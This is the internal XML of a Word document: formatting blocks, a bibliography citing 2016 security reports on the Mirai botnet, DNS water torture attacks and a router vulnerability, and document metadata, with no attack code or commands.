      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2026900286">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2029216438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2030715225">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2032142559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2035763342">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2042978293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2049135140">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2056344714">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2057923878">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2058695170">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2061319809">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2065518466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073305657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108765134">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2109231042">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2116366703">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2117827026">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2129740699">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144806689">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21457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Rol16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{458DC9B7-4DF3-495E-9B2F-628BB7CDD9CB}</b:Guid>
    <b:Title>Mirai IoT Botnet Description and DDoS Attack Mitigation</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Dobbins</b:Last>
            <b:First>Roland</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>10</b:Month>
    <b:Day>26</b:Day>
    <b:URL>https://www.arbornetworks.com/blog/asert/mirai-iot-botnet-description-ddos-attack-mitigation/</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>绿盟科16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{D9345443-F792-4F06-91E3-1949B1EE86B6}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>绿盟科技</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>德国1127断网事件技术分析与防护方案</b:Title>
    <b:InternetSiteTitle>绿盟科技博客</b:InternetSiteTitle>
    <b:Year>2016</b:Year>
    <b:Month>12</b:Month>
    <b:Day>25</b:Day>
    <b:URL>http://blog.nsfocus.net/germany-1127-network-events/</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>360</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{070EB370-DD23-4389-BE89-EF895E15E9FD}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>关于dyn/twitter受攻击情况的说明和mirai僵尸网络的回顾</b:Title>
    <b:URL>http://blog.netlab.360.com/a-dyn-twitter-ddos-event-report-and-mirai-botnet-review/</b:URL>
    <b:Year>2016</b:Year>
    <b:Month>10</b:Month>
    <b:Day>23</b:Day>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>36016</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{71D773EB-2030-4D4C-80D4-26E3267ED433}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>关于 mirai 僵尸网络控制主机的数据分析</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>10</b:Month>
    <b:Day>27</b:Day>
    <b:URL>http://blog.netlab.360.com/a-mirai-botnet-c2-data-analysis/</b:URL>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Tak16</b:Tag>
    <b:SourceType>ArticleInAPeriodical</b:SourceType>
    <b:Guid>{BB4EB0F8-0DD0-4245-8B51-A4E39366D44C}</b:Guid>
    <b:Title>Detection of the DNS Water Torture Attack by Analyzing Features of the Subdomain Name</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>24</b:Month>
    <b:Day>5</b:Day>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Takeuchi Y</b:Last>
            <b:First>Yoshida</b:First>
            <b:Middle>T, Kobayashi R, et al.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:PeriodicalTitle>Journal of Information Processing</b:PeriodicalTitle>
    <b:Pages> 793-801</b:Pages>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sec14</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{063DF24B-F63C-4888-B068-ED0A592F8A2C}</b:Guid>
    <b:Title>Water Torture: A Slow Drip DNS DDoS Attack</b:Title>
    <b:Year>2014</b:Year>
    <b:Author>
      <b:Author>
        <b:Corporate>Secure64</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Month>2</b:Month>
    <b:Day>25</b:Day>
    <b:URL>https://blog.secure64.com/?p=377</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>360161</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{EC8E463A-2D19-4819-AC71-0F83AF95A1ED}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>德国电信断网：mirai僵尸网络的新变种和旧主控</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>11</b:Month>
    <b:Day>29</b:Day>
    <b:URL>http://blog.netlab.360.com/a-mirai-botnet-evolvement-new-variant-and-old-c2/</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>李东宏16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{F24B9C47-C23B-4C14-916D-5FD1E1A9BC59}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>李东宏</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mirai源码分析报告</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>10</b:Month>
    <b:Day>13</b:Day>
    <b:URL>http://blog.nsfocus.net/mirai-source-analysis-report/</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>3601</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{67FC73D4-FF45-4EB1-AFDA-34944D87AEA3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>360网络安全研究院</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Mirai Scanner</b:Title>
    <b:URL>http://data.netlab.360.com/mirai-scanner</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bad</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{73DB4115-7495-42D1-ADBC-7A717ABF2EF2}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>BadCyber</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>New Mirai attack vector – bot exploits a recently discovered router vulnerability</b:Title>
    <b:URL>https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Wik16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{C77639F4-6479-49DB-8C58-5FABB730C6A3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Wikipedia</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Mirai (malware)</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>12</b:Month>
    <b:URL>https://en.wikipedia.org/wiki/Mirai_(malware)</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>len16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{D9EBE9C0-1692-46C2-BE0D-AC62868F5892}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>lennarthaagsma</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>11</b:Month>
    <b:Day>28</b:Day>
    <b:URL>https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ken16</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{E72B2DA5-E26B-4EC0-8A23-E8EB5FE79C7F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Kenzo</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Eir’s D1000 Modem Is Wide Open To Being Hacked</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>11</b:Month>
    <b:Day>7</b:Day>
    <b:URL>https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>360162</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{6FEA8B73-7DBA-4E62-A667-493843645999}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>360网络安全研究院</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mirai 变种中的DGA</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>12</b:Month>
    <b:Day>9</b:Day>
    <b:URL>http://blog.netlab.360.com/new-mirai-variant-with-dga-chinese-version/</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{11AE9D98-DE08-4494-BEE3-93F4174A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TotalTime>
  <Pages>10</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limz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>limz</cp:lastModifiedBy>
  <cp:revision>174</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-07T06:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-19T03:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>